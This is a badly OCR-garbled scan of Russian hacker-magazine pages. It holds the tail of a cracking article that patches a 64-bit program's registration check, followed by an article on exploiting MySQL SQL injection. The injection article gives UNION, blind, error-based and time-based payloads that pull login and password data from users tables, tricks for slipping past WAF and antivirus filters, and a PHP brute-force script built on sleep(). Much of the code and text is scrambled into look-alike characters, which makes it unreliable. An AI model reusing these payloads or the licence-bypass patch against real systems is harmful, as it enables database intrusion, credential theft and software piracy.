редакция за твои 
действия ответствен- 
ности не несут! 
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НЕУДАЧНАЯ ПОПЫТКА РЕГИСТРАЦИИ РІІВАЫ 
ОЕРРАО 





НАСТРОЙКИ ОТЛАДЧИКА В ЮА 



.кехк: 00000 00000407 0А2 
. кехк : 00000 00000407 0А8 
. кехк : 00000 00000407 0АВ 



шоѵ г9с1, 4 0й 
шоѵ гсх, гзі 
саіі зиЪ_42Б600 



Прокрутим листинг чуть выше іпѵа ІісІ_гед_сосІе и увидим код, который 
считывает и проверяет введенный регистрационный код: 



. Сехе : 0000000000406Е2В саіі ?СекБІдІкет@ШпсШ@ 
ОЕВАРЕАѴ10Ш2 ; ОТпй : : СекБідІкет ( іпС ) 

. СехС : 0000000000406ЕЗ 0 тоѵ г8сі, 7ЕЕЕЙ 
. СехС : 00000 00000406ЕЗ б тоѵ гсіх, гсіі 
. Вехе : 00000 00000406ЕЗ 9 тоѵ гсх, гах 
.СехС : 0000000000406ЕЗС саіі зиЪ_42В098 



; в этой процедуре берем текст из эдита 



.кехк: 00000 00000406Е41 
. СехР : 00000 00000406Е44 
. СехР : 00000 00000406Е49 
. СехР : 00000 00000406Е4В 
.кехк: 00000 00000406Е51 



тоѵ гсх , гсіі 

саіі сйеск_гед_сос1е 

кезк еах, еах 

37 . іпѵа 1іб_гед_с обе 

тоѵ есх, 80 Ой 



.кехк :000000000040940Е 
. кехк : 0000000000409412 
. кехк : 00000 000004094ІА 
.кехк: 00000 000004094ІБ 
. кехк :00000000004094ІБ 
. кехк : 0000000000409425 
. кехк :000000000040942Б 
. кехк : 0000000000409434 



стр гЬх , гсіі 

тоѵ гЬх, [гзр+0А8й+агд_8 ] 
зекг аі 

1епдкй_пок_таксй : 

тоѵ гІЗ , [гзр+0А8й+ѵаг_18] 

тоѵ гсіі , [гзр+0А8й+ѵаг_8 ] 

аскЗ гзр, 0А8й 

гекп 



Далее сделаем патч функции сЬеск_гед_сосІе. Патч перехода 
после вызова этой функции, как известно, некрасивое решение, 
поэтому будем модифицировать саму сбеск_гед_сосІе. Чтобы 
программа думала, что зарегана, необходимо сделать так, чтобы 
функция возвращала всегда единицу. Для этого запишем в нача- 
ле сбеск_гед_сосІе: 

зиЪ еах , еах 
іпс еах 
гек 



В случае если в еах будет ненулевое значение, то программа поблаго- 
дарит за регистрацию и запишет в файл прбб.рсік («спрятанный» в \ 
ѴѴІ N 00ѴѴ5\5у5І:ет32\) введенный ключ. Этот же ключ проверяется при 
запуске приложения. 

Функция, обозначенная у меня как сбеск_гед_собе, вызывается 
только из двух мест: при старте программы и при проверке введен- 
ного кода. В этом ты можешь убедиться, если заглянешь в окно ссы- 
лок на функцию (хгеіз) в ЮА. 



. ЦехЦ : 0000000000409 1Б0 
. ЦехЦ : 0000000000409 1Б0 
.кехк: 00000 000004091Б5 
. кехк : 0000000000409 1Б8 
. кехк : 00000 000004091БЕ 
. кехк : 0000000000409 1ЕЗ 
. кехк : 00000 000004091Е5 
. ЦехЦ : 0000000000409 1Е 9 
.кехк : 00000 000004091ЕС 
. ЦехЦ : 0000000000409 1ЕЗ 
. кехк : 0000000000409 1Е б 
. кехк : 0000000000409 1Е 9 
. кехк : 00000 000004091ЕС 
. ЦехЦ : 0000000000409200 



сйеск_гед_сос1е ргос пеаг 

тоѵ [гзр+агд_0] , гсх 

тоѵ гіі, гзр 

зиЪ гзр, 0А8Й 

тоѵ [г11-8 ] , гсіі 

хог еах, еах 

тоѵ [ГІ1-18Й] , гІЗ 

тоѵ гІЗ , гсх 

тоѵ гсх, ОЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЙ 

тоѵ гсіі , гІЗ 

герпе зсазм 

пок гсх 

зиЪ гсх , 1 

стр гсх, 19Ь 



; сколько символов регистрационный код? если 



не 25 (19й) , то нас посылают сразу 

. кехк : 0000000000409204 зпг 1епдкй_пок_таксЪ. 
. кехк : 00000000004092 0А сйескіпд_: 



; проверка введенного кода 



В опкодах это будет выглядеть как 2В СО РР СО СЗ. Кстати, в 64-битном 
режиме однобайтовые инструкции іпс, которые применялись для рабо- 
ты с регистрами в 32-разрядном коде (іпс еах, іпс ебх еіе) , не поддер- 
живаются. Дело тут в гех-префиксах, в диапазон которых и попадают 
однобайтовые команды инкремента. Почитать об этом можно в уже 
упомянутом мной третьем томе руководства программиста АІѴЮ, ну или 
у Интелов. 

Как я говорил, для патча будем юзать Нех Есіііог Ыео. Грузим файл 
РигапОеФадСІЛ.ехе в хекс-редактор. Запускаем дизассемблер (меню 
Тооіз Пип бізаззетЫег). В настройках указываем дизассемблируе- 
мую секцию и набор команд. Помимо 64-битного кода, Ыео есіііог может 
дизасмить тзіі и 32-битный код. 

Жмем <СМ+0> (Со Ію), чтобы перейти по нужному адресу, выбираем 
Ѵігіиаі Асісігезз (по умолчанию Ыео Нех Есіііюг предлагает вводить Наѵѵ 
Абсігезз) и вводим 00000000004091 ОО, Это соответствует адресу начала 
функции сбеск_гед_собе. Что тут можно сказать — Ыео Нех Есіііюг штука 
с перегруженным интерфейсом и непривычная (после Хью или ОНуОЬд), 
но для патча вполне применимая. После всех этих манипуляций про- 
грамма будет «зарегана». 

сомсиізюм Вот и познакомились с патчем и исследованием 
64-битных программ. И это только начало (причем пример был 
очень простой), так как есть 64-битные протекторы исполняемых 
файлов (например, РеЭріп х64), уже знакомые крекеру по 32-бит- 
ному опыту. С распаковкой тоже свои тонкости. Так, для дампа и 
последующей реконструкции импорта потребуется другой софт, 
привычные ЕогсІРе / РеТооІз и Ітргес здесь бессильны. Но об этом 
в следующих статьях. Удачи в исследованиях! ц-ц 



► обо 
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ВЛАДИМИР О02ЫР ВОРОНЦОВ 0№Еі 



БЫСТРЕЕ. ВЫШЕ 

и снова Быстрее 



РЕВОЛЮЦИОННЫЕ ПОДХОДЫ 
К ЭКСПЛУАТАЦИИ 301-ИНЪЕКЦИЙ 




В ПОСЛЕДНЕЕ ВРЕМЯ СТАЛО МОДНЫМ ПИСАТЬ ПРО 501-ИНЪЕКЦИИ. 
СЛЕДУЯ ЭТИМ ТЕНДЕНЦИЯМ. МЫ ПОДГОТОВИЛИ ДЛЯ ТЕБЯ НОВЫЕ 
МЕТОДИКИ УСКОРЕНИЯ РАБОТЫ С ВИМ-8Ш. И КОНСОЛИДИРОВАЛИ 
НЕКОТОРЫЕ НОВЫЕ ТРЮКИ ПО ЭКСПЛУАТАЦИИ САМЫХ ОБЫЧНЫХ 
ИНЪЕКЦИЙ. 



«ЗОБ-инъекция» — способ нападения на базу 
данных в обход межсетевой защиты. В этом 
методе параметры, передаваемые к базе 
данных через ѴѴеЬ-приложения, изменяются 
таким образом, чтобы повлиять на выполняе- 
мый в приложении 501-запрос. Инъекция 
осуществляется через все доступные способы 
взаимодействия с приложением (0ЕТ/Р05Т/ 
СООКІЕМс). 

Нападение может использоваться для сле- 
дующих целей: 

1. Получить доступ к данным, которые обычно 
недоступны, или получить данные конфигура- 
ции системы, которые могут использоваться 
для развития вектора атаки. Например, 
измененный 50Е-запрос может возвратить 
хешированные пароли пользователей, кото- 
рые впоследствии могут быть расшифрованы 
методом перебора. 

2. Получить доступ к другим системам через 
компьютер, на котором находится база 
данных. Это можно реализовать, используя 
процедуры базы данных и расширения ЗСБ- 
языка, которые позволяют взаимодействовать 



с операционной или файловой системой. 

По техники эксплуатации ЗСИ-инъекции 
условно можно разделить на три группы: 

1. Классическая 80Ь-инъекция 

2 . Слепая ЗСД- инъекция (Ыіпсі ЗОЬ 
Іпз есЫоп) 

3. Абсолютно слепая ЗСД -инъекция 
(БоиЫе Ыіпсі 8<2Ь Іпз есЫоп) 

Рассмотрим каждую технику более подробно. 
Учитывая, что эксплуатация 506 Іщесбоп 
сильно зависит от используемого языка 
структурированных запросов (506, 5ігис1:и гесі 
Оиегу бапд иаде) , ограничимся наиболее 
распространенной базой данных — МуЗСП. 
Также будем предполагать, что инъекция 
осуществляется через ЗЕБЕСТ-запрос, а не 
через, например, ІЫЗЕРТ. 

КЛАССИЧЕСКАЯ ЗОЬИНЪЕКЦИЯ 

Классическая техника эксплуатации 5СІЕ- 
инъекций — это, прежде всего, возмож- 
ность объединить два ЗОЕ-запроса с целью 



получения дополнительных данных из неко- 
торой таблицы. Возможность проведения 
классической инъекции во многом упрощает 
получение полезной информации из СУБД :). 
Проведение атаки в основном происходит с 
использованием оператора ипіоп. В случае, 
когда в тело возвращаемой страницы выво- 
дится только одна запись из таблицы, прибе- 
гают к технике построчного чтения данных: 



?/іб=1 Іішіб О 
1одіп,раззѵ\гогс1 
ОД 

?/Ы=1 Іігпіб О 
1одіп,раззѵ\гогс1 
1 Д 

Или так: 



ипіоп зеіесб 
ігош изегз іітіб 

ипіоп зеіесб 
ігот изегз ІішіР 



?/іб=1 іітіб 0 ипіоп зеіесб 
1одіп,раззѵ\гогс1 ігот изегз ІішіР 1 
оіізеб О 



?/іб=1 ІітіР 0 ипіоп зеіесб 
1одіп,раззѵ\гогс1 ігот изегз іітіб 1 



► 062 
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оіізеі 1 

Надо сказать, что получение данных из большой табли- 
цы при таком подходе является достаточно долгим про- 
цессом. Поэтому когда пользователь, от имени которого 
выполняются запросы к Му5СН_, обладает привилегиями 
ІіІе_ргіѵ, становится возможным использовать вывод 
зеіесі-за проса в файл: 

?/іс!=1 ІігпіС 0 ипіоп зеІесС Іодіп, раззілгогсі 
ігот изегз іпСо оиііііе ' Дтр/изегз ' 

ИЛИ 



?/ісІ=1 ІішіС 0 ипіоп зеіесі Іодіп, раз зѵ\гогс1 
ігот изегз іпіо сіитріііе ' Дтр/изегз ' 



ЭКСПЛУАТАЦИЯ 5<ЭІ.-ИНЪЕКЦИЙ СИЛЬНО ЗАВИСИТ ОТ ИС- 
ПОЛЬЗУЕМОГО ЯЗЫКА СТРУКТУРИРОВАННЫХ ЗАПРОСОВ И 
ВОЗМОЖНОСТЕЙ СУБД 



/?іс!=1 ипіоп зеіесі раззѵД ігош изегз 
/?іс!=1 ипіоп зеіесі разз ігот изегз 
/? іс!=1 ипіоп зеіесі раззѵгогсі ігот изег 
/?ісІ=1 ипіоп зеіесі Іодіп ігот изегз— 

И т.п. Но как быть, если необходимо использовать имен- 
но колонку с именем «раззѵѵогб» и таблицу с именем 
«изегз»? Как один из вариантов, можно эксплуатировать 
уязвимость слепым методом: 




> іпіо 

• Авторские блоги: 

беѵІееѵ.Ыодзроісот 

охоб.ги . 



Собственно, возможность работать с файловой систе- 
мой при эксплуатации 501-инъекции — это один шаг до 
получения возможности выполнения команд на сервере. 
Потому 50І_-инъекции и относятся к классу уязвимостей 
Соттапб Ехесибоп в общепринятой терминологии. 

Когда инъекция попадает в 501-запрос, который осу- 
ществляется в таблице с ограниченным числом столбцов, 
прибегают к функциям склеивания данных, таким как 
сопсаШ и сопсаМ/ѵзО: 

?/іО=1 ІігпіС 0 ипіоп зеіесі 
сопсаС (Іодіп , раз зтлгогсі) ігош изегз 
?/іО=1 ипіоп зеіесі сопсаС_ 
ілгз ( 1 : ' , Іодіп, раз зѵ\гогс1) ігогп изегз 

А для случаев, когда после внедряемого запроса присут- 
ствуют «остатки» от «хорошего» 501-запроса, прибегают 
к вырезанию этого «мусора» путем использования ком- 
ментариев: 



?/іс1=1 ипіоп зеіесі Іодіп , раззѵгогсі ігогп 
изегз-- 

?/ісІ=1 ипіоп зеІесС Іодіп , раз зѵтогсі ігош 
изегз/* 

?/іс1=1 ипіоп зеІесС Іодіп , раззмогсі ігош 
изегз# 

Все просто и легко, но лишь до момента, пока суровые 
администраторы не стали использовать различные фильтры 
безопасности (ака ѴѴАР, ѴѴеЬ Арріісабоп РігеѵѵаЩ, чтобы 
защитить дырявые ѴѴеЬ-приложения. Такие фильтры преи- 
мущественно используют сигнатурный анализ, что является 
их основным недостатком. Возможности языка 5СИ во мно- 
гих случаях позволяют обойти различного рода фильтрацию 
поступающих данных в приложение. Например, забавно 
наблюдать, как КІ5 2009 ругается на следующий запрос: 

/?іс!=1 ипіоп зеіесі раззѵгогсі ігогп изегз 

Примечательно, что такие запросы проходят без какой- 
либо реакции: 



/?ісІ=1 апсі 1 = іі (огсі ( ( Іомег (тісі ( ( зеІесС 
раззѵ\гогс1 ігот изегз ІітіС 
ОД) ДД) ) ) )=ЖШ,1, 2) — 



В данном случае фильтр КІ5 обходится еще более изящно 
;]. Сигнатура срабатывает только на строки «раззѵѵогб» 
и «изегз», следующие после ключевого слова «ипіоп». 
Учитывая это, можно составить запрос, который будет 
работать в обход фильтра: 

/?ІД=1 апй (зеіесС (@ѵ: =раззѵ\гогс!) ігош изегз 
ІігпіС ОД) ипіоп зеІесС @ѵ-- 
/?ісІ=1 апД (зеІесС (@ѵ: =раззтлгогс1) ігош изегз 
ІішіС 1Д) ипіоп зеІесС @ѵ-- 

А вот так красиво обходится, казалось бы, непреступный 
ѵѵаі тосДзесигКу последней сборки: 

/ ?іс!=1/ * ! ІітД 0 ипіоп зеІесС сопсаС_ 
мз(0х3а, Іодіп, раззѵтогсі) ігот изегз*/ 

/?іД=1/* 1 123451ІШІС 0 ипіоп зеіесС сопсаС_ 
ілгз (0x3а, Іодіп, раззѵгогсі) ігот изегз*/ 

Это работает, потому как Му5СИ, встретив конструкции 
вида «/*!Ыа-Ыа*/» и «/*!12345Ыа-Ыа*/» проинтерпрети- 
рует «Ыа-Ыа» как 5СИ-код :]. Во втором случае мускуль 
сравнивает свою версию с числом «12345» и, если запу- 
щенная версия выше этого значения, то зді-код будет 
исполнен. А «разумный» ппосДзесигку, прежде чем прове- 
сти запрос по своим сигнатурам базы уязвимостей 5СИ- 
Іщесбоп, избавляется от лишних данных в поступающем 
запросе, т.е. от комментариев вида /**/. 

Но не всегда существует возможность влиять на возвра- 
щаемые данные приложением при внедрении операторов 
5СИ. Тогда уязвимость является «слепой». Стоит также 
добавить, что многие фильтры (в том числе и ѴѴАР) легко 
обходятся именно с использованием техники эксплуата- 
ции ЫіпсІ 5СД Іщесбоп. 

СЛЕПАЯ ЗОЬИНЪЕКЦИЯ Слепая 5СИ Іщесбоп появля- 
ется, когда уязвимый запрос является некоторой логикой 
работы приложения, но не позволяет вывести какие-либо 



• Использование би- 
нарногодерева при 
эксплуатации слепых 
501-инъекций 
заметно повышает 
эффективность по- 
символьного пере- 
бора ( іщесбоп.гиіегг. 
ги/тузді сбаг Ьгиіе. 
Мті). 

• еп.ѵѵікіребіа.огд/ 
ѵѵікі/Ргедиепсу 
апаіузіз — базовые 
знания по частотному 
анализу можно по- 
черпнуть в ВИКИ. 

• хтето.пагосі.ги/ 
іпсІех.ЫппІЗіехРДпп 

— программа для со- 
ставления словарей 
на основе частотного 
анализа. 

• зІаІзоД.ги/Ьоте/ 
роНаІ/ехсбапде/ 
ІехІапаІѵзіз.Ыт — 

статья о частотном 
анализе в разных 
языках. Рекомендует- 
ся к прочтению весь 
раздел «Используе- 
мая литература». 
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КЛАССИЧЕСКИМ ЧАСТОТНЫЙ 
АНАЛИЗ АНГЛИЙСКОГО ЯЗЫКА. 
АНАЛОГИЧНЫЙ ГРАФИК МОЖНО 
НАЙТИ НАѴѴІКІРЕ0ІА.0К6 

данные в возвращаемую ѴѴеЬ-приложением 
страницу. Пример уязвимого кода на РНР, 
содержащего уязвимость ВІіпсІ ЗОИ Ігуесѣіоп : 



$гезиІД = тузд1_диегу ( " ЗЕЬЕСТ 
изег ЕЕОМ изегз ѵкіе ге ісі = ". $_ 
СЕТ ['ій']) ог сИе('()иегу Даііесі: 
' . шузд1_еггог ( ) ) ; 

і Д (тузд1_пит_гомз ( $гезиІД ) >0 ) 

{ 

какая-то логика приложения, 
например , выполнение другого 
зеІесД -запроса 



таблице или в файле. Пример эксплуатации 
уязвимости для приведенного выше кода: 

/?іс!=1 апсі 555=іД (огсі (тісі ( ( зеІесД 
разз Дгот изегз ІітіД 
0,1) ,1,1) ) =97 , 555 , 777 ) . 

Если таблица «изегз» содержит колонку 
«разз», и первый символ первой записи 
из этой колонки равен 97 (символ «а»), то 
мускуль вернет ТРИЕ и запрос будет истин- 
ным. В противном случае — ЕАИЗЕ, и для 
приведенного кода на странице отобра- 
зится «еггог». Приведенная выше техника 
использовалась долгое время, но после 
выхода Х07’09 и Х09’09 ситуация коренным 
образом поменялась. Оѵѵагаг описал новые 
направления эксплуатации слепых ЗОИ- 
инъекций. Его техника, в первом случае, 
заключается в использовании некорректных 
регулярных выражений, на которые МуЗСк 
по-разному ругается во время выполнения 
зеіесі-запроса (именно во время выполнения 
ЗСк-запроса, а не на моменте проверки его 
синтаксиса). Совместно с методом, предло- 
женным Еіекі; (зеіесі: 1 ипіоп зеіесі: 2), Оѵѵагаг 
продемонстрировал, как за один запрос к 
ѴѴеЬ-приложению можно подбирать до 12-ти 
символов. Запрос для атаки выглядит сле- 
дующим образом: 

/?іс1=1 АКБ 1 гііке сопсаД ( 

ІД ( (тісі ( (зеІесД разз Дгот изегз 
ІітіД 0,1) ,1,1) іп( • 0 * ) ) >0, ( 0x7 87ВЗ 
12С3235367Б) , 

ІД ( (тісі ( ( зеІесД разз Дгот 
изегз ІітіД 0,1), 1,1) 
іп( ' 1 ' ) )>0, ( 0x7 87ВЗ 12С2 8 ) , 
і Д ( (тісі (( зеІесД разз Дгот 
изегз ІітіД 0,1), 1,1) 

±п ( ' 2 ' ) ) >0 , ( 0х5В5ВЗА5Б5Б) , 



5ЕСІІРІТѴ 



Сіс.Т и ■ е 

ГРОЗНЫЙ мой 




АНАТОМИЯ СЛЕПЫХ 
ЗОЬИНЪЕКЦИЙ 



сообщение об ошибке «#1139 — Соі еггог 'іпѵаііб 
гереііііоп соип^з]' кот гедехр». Если первый 
символ колонки «разз» равен единице, то будет 
получена ошибка «#1139 — Соі еггог 'Ьгасез поі 
ЬаІапсесГ кот гедехр» и т.д. Другое направление 
по быстрой эксплуатации слепых ЗОИ-инъекций, 
которое продемонстрировал Оѵѵагаг, заклю- 
чалось в использовании сообщения ошибки 
Му5(Х в качестве «контейнера» для полезных 
данных (настоящий прорыв в методике эксплуа- 
тации ЫіпсІ ЗОЕ Іпіесбоп]. Так, запрос вида: 

/?ісІ=1 ипіоп зеІесД * Дгот 
(зеІесД * Дгот (зеІесД паше_ 
сопзД (( зеІесД разз Дгот изегз 
ІітіД 1), 14 ) сЗ.) аз Д ;)оіп (зеІесД 
паше_сопзД ( ( зеІесД разз Дгот 
изегз ІітіД 1), 14)е) Ь)а 

выдаст сообщение об ошибке, в котором 
будут находиться полезные данные из колон- 
ки «разз», например, М05-хеш: 



#1060 



БирІісаДе соіишп паше 'Д8 



} 

еізе 

{ 

} 



есДю "еггог"; 



Слепая ЗОЕ-инъекция по своим возможно- 
стям сопоставима с классической техникой 
внедрения операторов ЗОЕ. Аналогично 
классической технике эксплуатации подоб- 
ных уязвимостей, ЫіпсІ ЗСк-Іщесбоп позво- 
ляет записывать и читать файлы, получать 
данные из таблицы, но только чтение в 
данном случае осуществляется посимвольно. 
Стандартная техника эксплуатации подобных 
уязвимостей основывается на использовании 
логических выражений киеЛаІзе. Если выра- 
жение истинно, то ѴѴеЬ-приложение вернет 
одно содержимое, а если выражение являет- 
ся ложным, то другое. Полагаясь на различия 
вывода при истинных и ложных конструкциях 
в запросе, становится возможным осущест- 
влять посимвольный перебор данных в 



ІД ( (тісі ( (зеІесД разз Дгот 
изегз ІітіД 0,1), 1,1) 
іп( '3 ' ) ) >0 , ( 0х5В5В) , 

ІД ( (тісі ( (зеІесД разз Дгот 
изегз ІітіД 0,1), 1,1) 
іп( '4 ' ) )>0, ( 0x2 82 87ВЗ 17Б) , 

ІД ( (тісі ( (зеІесД разз Дгот изегз 
ІітіД 0,1) ,1,1) іп( '5' ) )>0, (0x0) , 

ІД ( (тісі ( (зеІесД разз Дгот изегз 
ІітіД 0,1) ,1,1) іп( '6' ) )>0, (0x28) , 
ІД ( (тісі ( (зеІесД разз Дгот 
изегз ІітіД 0,1), 1,1) 
іп( ' 7 ' ) ) >0 , (0х5В322Б315Б) , 

ІД ( (тісі ( (зеІесД разз Дгот изегз 
ІітіД 0 , 1 ) , 1 , 1 ) іп ( ’ 8 ' ) ) >0 , ( 0х5В5В2 
Е63682Е5Б5Б) , 

ІД ( (тісі ( (зеІесД разз Дгот изегз 
ІітіД 0,1) , 1 , 1 ) іп ( ' 9 ' ) ) >0 , (0х5С) , 
ІД ( (тісі ( (зеІесД разз Дгот изегз 
ІітіД 0,1) ,1,1)іп( , а'))>0, ( зеІесД 
1 ипіоп зеІесД 2 ),( 1 )))))))))))) ) 

Так, если таблица «изегз» содержит колонку 
«разз» и первый символ первой записи из 
этой колонки равен нулю, то мускуль вернет 



с180сІеД69сІсЗее86с5381219е4с5с80 ' 

Используя указанный способ, за один запрос 
к ѴѴеЬ-приложению уже можно получить до 
64-х байт полезных данных. Используя функ- 
ции склеивания строк сопсаШ или сопсаІ_ 
ѵѵз(), становится возможным достаточно 
эффективно и за короткое время получить 
дамп всей таблицы. К сожалению, подобный 
трюке функцией пате_сопзі() пройдет толь- 
ко в Му5Ск версиях 5.0.1 2>5.0.64. 

Продолжив раскопки в направлении замены 
функции пате_сопз1:(], обнаружили не менее 
полезную функцию ЕхкасіѴаІиеО, которая 
появилась в МуЗОИ версии 5.1.5. Указанная 
функция предназначена для извлечения 
значений из ХМИ-потока данных. Но для этой 
функции можно найти и другое, хакерское 
применение :]. Следующий запрос: 

/?ісІ=1 апсі ЕхДгасДѴаІие ( 1 , сопсаД ( 0 
х5С, (зеІесД разз Дгот изегз ІітіД 
0 , 1 ) ) ) ? 

вернет сообщение об ошибке: 



► 064 
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СРАВНЕНИЕ ПОЛНОГО ЧАСТОТНОГО 
АНАЛИЗАБУКВ В АНГЛИЙСКОМ ЯЗЫКЕ 
С ЧАСТОТНЫМ АНАЛИЗОМ ПЕРВОЙ БУКВЫ 
В СЛОВАХ 



ХРАТН зупбах еггог: 
1219е4с5с8 ' 



* \18с180сІ.е:Е:69сІсЗее86с538 



Заголовок 

параметре 

Заголовок 

параметре 

Заголовок 

параметре 



новости 111 — идентификатор в 
іс!=32 45 — подбираемый символ О 
новости 222 — идентификатор в 
іб=2456 — подбираемый символ 1 
новости 333 — идентификатор в 
іб=45б2 — подбираемый символ 2 



и т.д. 



Ѵ/А' / 
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РА5Т Б01ІВІ.Е ВШИБ 501. ІЫЗЕСТІОЫ РРООР ОР СОІМСЕРТ 



То есть, с ограничением в 31 полезных байт за один 
запрос к ѴѴеЬ- приложен ию можно считывать данные из 
таблицы при эксплуатации слепых 506-инъекций под 
Му50І_ 5.1.5 и выше. Ошибка «ХРАТН зупТах еггог» возни- 
кает по причине использования все того же некорректно- 
го регулярного выражения — «\\». 

К сожалению, все описанное работает только в случае, 
когда в тело возвращаемой страницы попадает ошибка 
Му50І_, а это, увы, происходит далеко не всегда. И что 
же? Вновь пользоваться унылыми техниками посимволь- 
ного перебора? Не всегда! 

Очень часто 506-инъекцию можно встретить в цифровом 
параметре приложения, а в зависимости от указанной 
цифры, ѴѴеЬ-приложение возвращает разный контент. 
Уловил, к чему я клоню? Именно! Сопоставив цифры с 
самим контентом и наложив их на карту подбираемых 
символов, можно очень эффективно считывать данные из 
таблицы. Выглядеть это может так: 





ФОНЕТИЧЕСКАЯ ДИАГРАММА ДЛЯ БУКВЫ «А» 



Запрос для атаки (например, точная идентификация 
первого символа в М05-хеше] может выглядеть: 



ОД) дд 
іі ( (тіб ( 
0,1) ДД 
Іі ( (тіб ( 
ОД) ДД 
іб ( (шіб ( 
ОД) ДД 
і 6 ( (тіб ( 
ОД) ДД 
іі ( (тіб ( 
ОД) ,1,1 
іб ( (шіб ( 
ОД) ДД 
іб ( (шіб ( 
ОД) ДД 
і і ( (тіб ( 
ОД) ,1,1 
ті11) ) ) ) 



) іп ( ' 7 ' ) 
( зеіесб 
) іп ( ' 8 ' ) 
( зеіесб 
) іп ( ' 9 ' ) 
( зеіесб 
) іп ( ' а ' ) 
( зеіесб 
) іп ( ' Ь ' ) 
( зеіесб 
) іп( 'с ' ) 
( зеіесб 
) іп ( 1 б 1 ) 
( зеіесб 
) іп( ’е' ) 
( зеіесб 
)іп( Д’| 
)))))))) 



)>0 Д 
разз 
)>0 Д 
разз 
)>0 Д 
разз 
)>0 Д 
разз 
)>0 Д 
разз 
)>0 Д 
разз 
)>0 Д 
разз 
)>0 Д 
разз 
)>0 Д 
) ) ) ) 



12349 
б гот 

12350 
б гот 

12351 
б гот 

12352 
б гот 

12353 
б гот 

12354 
б гот 

12355 
б гот 

12356 
б гот 

12357 



изегз Іітіб 
) , 

изегз Іітіб 
) , 

изегз Іітіб 
) , 

изегз Іітіб 
) , 

изегз Іітіб 
) , 

изегз Іітіб 
) , 

изегз Іітіб 
) , 

изегз Іітіб 




> ѵѵагпіпд 

Внимание! Инфор- 
мация представлена 
исключительно 
с целью ознакомле- 
ния! Ни авторы, ни 
редакция за твои 
действия ответствен- 
ности не несут! 



/?іб=іб ( (тіб( (зеіесб разз бгот изегз Іітіб 

ОД) Д Д ) іп ( ' 0 ' ) ) >0 , (3245) , 

іб ( (тіб ( ( зеіесб разз бгот изегз Іітіб 

ОД) Д Д ) іп ( Ч') )>0, (2456) , 

іі ( (тіб ( ( зеіесб разз бгот изегз Іітіб 

ОД) , 1 , 1 ) іп ( ' 2 ' ) ) >0 , (4562) , 

іб ( (тіб ( ( зеіесб разз бгот изегз Іітіб 

ОД) , 1 , 1 ) іп ( ' 3 ' ) ) >0 , (12345) , 

іб ( (тіб ( ( зеіесб разз бгот изегз Іітіб 

0 Д) ДД)іп('4' ) )>0, (12346) , 

ІІ ( (тіб ( ( зеіесб разз бгот изегз Іітіб 

0 ,1) ,1 ,1) іп( ' 5 ' ) )>0, (12347) , 

іб ( (тіб ( ( зеіесб разз Пгот изегз Іітіб 

ОД) ,1,1) іп( 1 6 ' ) )>0, (12348) , 

іб ( (тіб ( ( зеіесб разз бгот изегз Іітіб 



Стоит учитывать, что для данного метода существует огра- 
ничение на длину НТТР-запроса в 8192 байт. В остальном 
метод достаточно эффективен в условиях, когда сообще- 
ние об ошибке Му506 не отображается в возвращаемой 
странице. По большому счету метод является универсаль- 
ным и не зависящим от используемой базы данных. 

двойная слепота Бывают случаи, когда помимо 

подавления всех уведомлений об ошибках в возвращае- 
мой странице со стороны ѴѴеЬ-приложения, уязвимый 
к инъекции 506-запрос используется исключительно 
для своих внутренних целей. Например, это может быть 
ведение лога посещений, различного рода внутренние 
оптимизации и пр. Подобные 506-инъекции относятся к 
третьей группе — Боибіе ЫіпсІ 506 Іщесбоп. 




> СІѴСІ 

На нашем дискеты 
найдешь ргооі" об 
сопсерб реализующий 
идею по максимально 
быстрой эксплуатации 
уязвимости боиЫе 
ЫіпсІ 506 Іщесбоп. 
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ЧАСТОТНЫЕ РАСПРЕДЕЛЕНИЯ 
ДЛЯ ЗНАЧЕНИЙ Мй5 



Техника эксплуатации подобной группы 
50І_-инъекций основана на временных 
задержках между посылаемым запросом к 
ѴѴеЬ-приложению и его ответом. В класси- 
ческом виде для ее эксплуатации исполь- 
зуют функцию ЬепсЬтагкО, однако лучшей 
практикой является использование функ- 
ции зІеерП. Функция зІеерП более безопас- 
на для подобных целей, ибо не использует 
процессорные ресурсы сервера, как это 
делает функция ЬепсЬтагИ). Пример 
самой простой реализации посимвольного 
перебора с использованием временной 
задержки представлен ниже. 

ІипсЪіоп ЬгиСе ( 

$со1ишп, $СаЫе, $1іт) 

{ 

$геС_зСг = " " ; 

$Ь_зЪг = " 1234567890_ 
аЪссІеІдМ дк1тпордгзкиѵѵ7ху2 " ; 

$Ь_агг = зСг_зр1іЦ ( $Ь_зСг) ; 

Іог ($і=1; $і<100; $і++) 

{ 

ргіпС " [+] Вгике $і 
зутЬоІ . . . \п" ; 

Іог ($з=0; $з<соипС ( $Ь_агг) ; 

$0 ++) 

{ 

$Ъгике = огсі ( $Ь_агг [ $з ] ) ; 

$ д = "/**/апсі/**/і1 ( (огй( 
Іоѵіет (тісі ( ( зеіеск/* Ѵ$со1итп/**/ 
1гот/**/$каЬ1е/**/1ітік/**/$1іт, 1) 
,$1,1)))) =$Ьгике , зіеер ( б ) , 0 ) -- " ; 

11 (ІШкр_соппеск ( $д) ) 

{ 

$гек_зкг = $гек_зкг.$Ъ_ 

агг [$з ] ; 

ргіпк $Ь_агг [ $з ] . " \п" ; 

Ьгеак; 

} 

ргіпк " . " ; 

} 

іі ($з == соипк ( $Ь_агг ) ) 

Ьгеак; 

} 

гекигп $гек_зкг; 

} 

Как можно увидеть, в массиве $ Ь_5 гі для 
подбора данных используется алфавитный 



V 




ФОНЕТИЧЕСКАЯ ДИАГРАММА 
ДЛЯ БУКВЫ «5» 

порядок. Сценарий последовательно пробует 
каждый символ из массива на совпадение с 
символом в базе. Попытаться ускорить про- 
цесс подбора можно, расположив символы 
в более благоприятном порядке или исполь- 
зовав бинарное дерево. Для последнего 
действия требуется воспользоваться симво- 
лами «>» и «<», что не всегда возможно, так 
как очень часто эти символы переводятся в 
НТМІ_-эквиваленты. Остается вопрос, — в 
каком таком «благоприятном виде» можно 
расположить перебираемые символы? 
Классические работы по частотному анализу 
букв английского алфавита, доступные в Сети, 
подсказывают последовательность, начинаю- 
щуюся с е, С а, о, п, і, з, И, г, 6 , I, и, с ( 
еп.ѵѵікіресІіа.ога/ѵѵікі/Ргедиепсѵ апаіѵзіг ]. 
Расположив буквы в таком порядке, можно 
уже говорить об уменьшении количества 
посылаемых запросов к ѴѴеЬ-приложению. 
Можно, но мы пойдем несколько дальше. 

НЕ ВСЕ БУКВЫ ОДИНАКОВО ПОЛЕЗНЫ 

Все справедливо, но совсем не учиты- 
вает один интересный факт — на каждой 
последующей итерации мы гарантированно 
знаем значение предыдущего символа. А 
это немало, и таким свойством грех не вос- 
